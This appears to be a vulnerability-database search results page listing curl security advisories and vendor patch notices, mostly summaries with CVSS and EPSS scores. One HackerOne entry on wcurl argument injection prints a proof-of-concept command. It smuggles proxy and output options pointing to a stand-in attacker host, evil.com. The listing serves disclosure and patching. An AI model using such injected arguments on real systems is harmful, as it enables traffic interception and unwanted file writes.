
10126 matches found

Broadcom
added 2026/01/27 12:0 a.m., 10 views

A denial of service vulnerability exists in curl

A denial of service vulnerability exists in curl v8.1.0 in the way libcurl provides several different backends for resolving host names, selected at build time. If it is built to use the synchronous resolver, it allows name resolves to time-out slow operations using alarm and siglongjmp. When doi...

5.9 CVSS, 6 AI score, 0.0087 EPSS
Exploits: 1

Broadcom
added 2026/01/27 12:0 a.m., 10 views

An allocation of resources without limits or throttling vulnerability exists in curl <v7.88.0

An allocation of resources without limits or throttling vulnerability exists in curl v7.88.0 based on the "chained" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with different algorithms. The number of acceptable "links" in this...

6.5 CVSS, 7.2 AI score, 0.00066 EPSS
Exploits: 1

Tenable Nessus
added 2026/01/27 12:0 a.m., 4 views

RHEL 9 : curl (RHSA-2026:1350)

The remote Redhat Enterprise Linux 9 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2026:1350 advisory. The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, a...

7.5 CVSS, 6 AI score, 0.00364 EPSS
Exploits: 1, References: 6

Packet Storm
added 2026/01/27 12:0 a.m., 131 views

📄 MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner

This PHP script is a command-line vulnerability scanner designed to detect CVE-2023-28432 in MinIO servers. The vulnerability allows unauthenticated access to sensitive environment variables through the /minio/bootstrap/v1/verify endpoint...

7.5 CVSS, 5.9 AI score, 0.94004 EPSS
Exploits: 13

OSV
added 2026/01/27 12:0 a.m., 3 views

ALSA-2026:1350 Moderate: curl security update

The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP. Security Fixes: curl: libcurl: Curl out of bounds read for cookie path CVE-2025-9086 For more details about the security issues, including...

7.5 CVSS, 5.4 AI score, 0.00364 EPSS
Exploits: 1, References: 4

Broadcom
added 2026/01/27 12:0 a.m., 14 views

A vulnerability in input validation exists in curl <8.0 during communication using the TELNET protocol may allow an attacker to pass on maliciously crafted user name and "telnet options" during server negotiation

A vulnerability in input validation exists in curl 8.0 during communication using the TELNET protocol may allow an attacker to pass on maliciously crafted user name and "telnet options" during server negotiation. The lack of proper input scrubbing allows an attacker to send content or perform...

8.8 CVSS, 7.6 AI score, 0.00148 EPSS
Exploits: 1

Hacker One
added 2026/01/25 4:20 p.m., 35 views

curl: wcurl Argument Injection via Unquoted Variable

When I was code auditing curl I stumbled upon a vulnerability that was on wcurl. Affected version: current. Step 1: open terminal. Step 2: run PoCs below: wcurl --dry-run --curl-options='-x http://evil.com:8080 -o /tmp/pwned' https://example.com/test.txt wcurl --dry-run --curl-options='-o...

6 AI score
Exploits: 0

Tenable Nessus
added 2026/01/24 12:0 a.m., 3 views

SUSE SLED15 / SLES15 Security Update : curl (SUSE-SU-2026:0221-1)

The remote SUSE Linux SLED15 / SLEDSAP15 / SLES15 / SLESSAP15 host has packages installed that are affected by a vulnerability as referenced in the SUSE-SU-2026:0221-1 advisory. - CVE-2025-14017: Fixed broken TLS options for threaded LDAPS bsc1256105. Tenable has extracted the preceding descripti...

6.3 CVSS, 6.7 AI score, 0.00003 EPSS
Exploits: 0, References: 4

Tenable Nessus
added 2026/01/24 12:0 a.m., 3 views

Unity Linux 20.1050a / 20.1060a / 20.1070a Security Update: curl (UTSA-2026-004936)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-004936 advisory. When doing multi-threaded LDAPS transfers LDAP over TLS with libcurl, changing TLS options in one thread would inadvertently change them globally and therefore...

6.3 CVSS, 5.6 AI score, 0.00003 EPSS
Exploits: 0, References: 4

Tenable Nessus
added 2026/01/24 12:0 a.m., 4 views

Unity Linux 20.1050a / 20.1060a / 20.1070a Security Update: curl (UTSA-2026-004937)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-004937 advisory. curl's code for managing SSH connections when SFTP was done using the wolfSSH powered backend was flawed and missed host verification mechanisms. This prevents curl...

4.3 CVSS, 5.7 AI score, 0.00031 EPSS
Exploits: 1, References: 4

Tenable Nessus
added 2026/01/23 12:0 a.m., 4 views

Unity Linux 20.1050e / 20.1060e / 20.1070e Security Update: curl (UTSA-2026-004933)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-004933 advisory. curl's code for managing SSH connections when SFTP was done using the wolfSSH powered backend was flawed and missed host verification mechanisms. This prevents curl...

4.3 CVSS, 5.8 AI score, 0.00031 EPSS
Exploits: 1, References: 4

Tenable Nessus
added 2026/01/23 12:0 a.m., 5 views

Unity Linux 20.1050e / 20.1060e / 20.1070e Security Update: curl (UTSA-2026-004929)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-004929 advisory. When doing SSH-based transfers using either SCP or SFTP, and asked to do public key authentication, curl would wrongly still ask and authenticate using a locally...

3.1 CVSS, 5.6 AI score, 0.00064 EPSS
Exploits: 1, References: 3

Tenable Nessus
added 2026/01/23 12:0 a.m., 3 views

Unity Linux 20.1050e / 20.1060e / 20.1070e Security Update: curl (UTSA-2026-004930)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-004930 advisory. When an OAuth2 bearer token is used for an HTTPS transfer, and that transfer performs a cross-protocol redirect to a second URL that uses an IMAP, LDAP, POP3 or SMTP...

5.3 CVSS, 5.6 AI score, 0.00022 EPSS
Exploits: 1, References: 3

Tenable Nessus
added 2026/01/23 12:0 a.m., 3 views

Unity Linux 20.1050e / 20.1060e / 20.1070e Security Update: curl (UTSA-2026-004931)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-004931 advisory. When doing SSH-based transfers using either SCP or SFTP, and setting the knownhosts file, libcurl could still mistakenly accept connecting to hosts not present in th...

5.3 CVSS, 5.6 AI score, 0.0003 EPSS
Exploits: 1, References: 3

Tenable Nessus
added 2026/01/23 12:0 a.m., 3 views

Unity Linux 20.1050e / 20.1060e / 20.1070e Security Update: curl (UTSA-2026-004928)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-004928 advisory. When doing multi-threaded LDAPS transfers LDAP over TLS with libcurl, changing TLS options in one thread would inadvertently change them globally and therefore...

6.3 CVSS, 5.6 AI score, 0.00003 EPSS
Exploits: 0, References: 3

OSV
added 2026/01/22 2:32 p.m., 5 views

CLSA-2026-1769092364 curl: Fix of CVE-2025-9086

CVE-2025-9086: cookie: don't treat the leading slash as trailing...

7.5 CVSS, 6.8 AI score, 0.00364 EPSS
Exploits: 1, References: 1

SUSE Linux
added 2026/01/22 12:15 p.m., 4 views

Security update for curl

This update for curl fixes the following issues: CVE-2025-14017: Fixed broken TLS options for threaded LDAPS bsc1256105. Patch Instructions: To install this SUSE update use the SUSE recommended installation methods like YaST onlineupdate or "zypper patch". Alternatively you can run the command...

7 CVSS, 5.4 AI score, 0.00003 EPSS
Exploits: 0, References: 4

OSV
added 2026/01/22 12:15 p.m., 2 views

SUSE-SU-2026:0221-1 Security update for curl

This update for curl fixes the following issues: - CVE-2025-14017: Fixed broken TLS options for threaded LDAPS bsc1256105...

6.3 CVSS, 5.8 AI score, 0.00003 EPSS
Exploits: 0, References: 3

Fedora
added 2026/01/22 1:8 a.m., 3 views

[SECURITY] Fedora 43 Update: curl-8.15.0-5.fc43

curl is a command line tool for transferring data with URL syntax, supporting FTP, FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS, FILE, IMAP, SMTP, POP3 and RTSP. curl supports SSL certificates, HTTP POST, HTTP PUT, FTP uploading, HTTP form based upload, proxies, cookies,...

6.3 CVSS, 6.1 AI score, 0.00003 EPSS
Exploits: 0

Tenable Nessus
added 2026/01/22 12:0 a.m., 3 views

Fedora 43 : curl (2026-e27b23af78)

The remote Fedora 43 host has a package installed that is affected by a vulnerability as referenced in the FEDORA-2026-e27b23af78 advisory. - fix broken TLS options for threaded LDAPS CVE-2025-14017 Tenable has extracted the preceding description block directly from the Fedora security advisory...

6.3 CVSS, 6.7 AI score, 0.00003 EPSS
Exploits: 0, References: 2